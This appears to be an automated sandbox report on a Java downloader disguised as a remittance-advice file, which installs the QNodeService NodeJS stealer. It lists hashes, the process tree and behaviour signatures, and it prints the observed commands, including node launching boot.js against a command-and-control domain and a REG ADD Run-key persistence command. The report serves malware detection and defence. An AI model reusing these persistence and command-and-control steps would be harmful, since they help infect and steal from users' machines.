Remittance Advice from Prespa Consultancy Pty Ltd.jar

General
Target

Remittance Advice from Prespa Consultancy Pty Ltd.jar

Filesize

76KB

Completed

23-11-2020 00:57

Score
10/10
MD5

00fbaeac41cb0a4dbc032fd8593e5ae7

SHA1

4749439b523248dabe38e0236fe4dcb77ae55c24

SHA256

d0276ecaa9b9c49b3b1d53d5a6fd47288a33e626d6255a476c624d86dccf2fad

Malware Config
Signatures 8

Filter: none

Defense Evasion
Discovery
Persistence
  • QNodeService

    Description

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    2896node.exe
    3228node.exe
    900node.exe
  • Adds Run key to start application
    reg.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Runreg.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\5ff9ec49-7764-45c2-9528-c05b5d236334 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""reg.exe
  • JavaScript code in executable

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000100000001aba0-177.datjs
    behavioral2/files/0x000100000001aba0-180.datjs
    behavioral2/files/0x000100000001aba0-184.datjs
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    21wtfismyip.com
    22wtfismyip.com
  • Checks processor information in registry
    node.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1node.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHznode.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameStringnode.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0node.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHznode.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringnode.exe
  • Suspicious behavior: EnumeratesProcesses
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    2896node.exe
    2896node.exe
    2896node.exe
    2896node.exe
    3228node.exe
    3228node.exe
    3228node.exe
    3228node.exe
    900node.exe
    900node.exe
    900node.exe
    900node.exe
    900node.exe
    900node.exe
    900node.exe
    900node.exe
    900node.exe
    900node.exe
  • Suspicious use of WriteProcessMemory
    java.exejavaw.exenode.exenode.exenode.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 636 wrote to memory of 3644636java.exejavaw.exe
    PID 636 wrote to memory of 3644636java.exejavaw.exe
    PID 3644 wrote to memory of 28963644javaw.exenode.exe
    PID 3644 wrote to memory of 28963644javaw.exenode.exe
    PID 2896 wrote to memory of 32282896node.exenode.exe
    PID 2896 wrote to memory of 32282896node.exenode.exe
    PID 3228 wrote to memory of 9003228node.exenode.exe
    PID 3228 wrote to memory of 9003228node.exenode.exe
    PID 900 wrote to memory of 3868900node.execmd.exe
    PID 900 wrote to memory of 3868900node.execmd.exe
    PID 3868 wrote to memory of 37243868cmd.exereg.exe
    PID 3868 wrote to memory of 37243868cmd.exereg.exe
Processes 7
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\Remittance Advice from Prespa Consultancy Pty Ltd.jar"
    Suspicious use of WriteProcessMemory
    PID:636
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2693ee72.tmp
      Suspicious use of WriteProcessMemory
      PID:3644
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain manhasnoplug.ddns.net
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_fpk140\boot.js --hub-domain manhasnoplug.ddns.net
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:3228
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_fpk140\boot.js --hub-domain manhasnoplug.ddns.net
            Executes dropped EXE
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:900
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "5ff9ec49-7764-45c2-9528-c05b5d236334" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:3868
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "5ff9ec49-7764-45c2-9528-c05b5d236334" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:3724
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

                      MD5

                      d41d8cd98f00b204e9800998ecf8427e

                      SHA1

                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                      SHA256

                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                      SHA512

                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                    • C:\Users\Admin\AppData\Local\Temp\2693ee72.tmp

                      MD5

                      00fbaeac41cb0a4dbc032fd8593e5ae7

                      SHA1

                      4749439b523248dabe38e0236fe4dcb77ae55c24

                      SHA256

                      d0276ecaa9b9c49b3b1d53d5a6fd47288a33e626d6255a476c624d86dccf2fad

                      SHA512

                      9e6fc3e8b5cf6a31b90c624d4c47240aed90e613c508640855585033a83ca3e8b4b5b67bc469a049652968da02fa5f7390f9c1f3e828dfc26c8ea7b5ee98fc89

                    • C:\Users\Admin\AppData\Local\Temp\_qhub_node_fpk140\boot.js

                      MD5

                      3859487feb5152e9d1afc4f8cd320608

                      SHA1

                      7bf154c9ddf3a71abf15906cdb60773e8ae07b62

                      SHA256

                      8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13

                      SHA512

                      826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • memory/900-185-0x000002E364400000-0x000002E364401000-memory.dmp

                    • memory/900-183-0x0000000000000000-mapping.dmp

                    • memory/2896-176-0x0000000000000000-mapping.dmp

                    • memory/2896-178-0x0000036A78540000-0x0000036A78541000-memory.dmp

                    • memory/3228-179-0x0000000000000000-mapping.dmp

                    • memory/3228-181-0x000001E05A140000-0x000001E05A141000-memory.dmp

                    • memory/3644-56-0x0000000000000000-mapping.dmp

                    • memory/3724-187-0x0000000000000000-mapping.dmp

                    • memory/3868-186-0x0000000000000000-mapping.dmp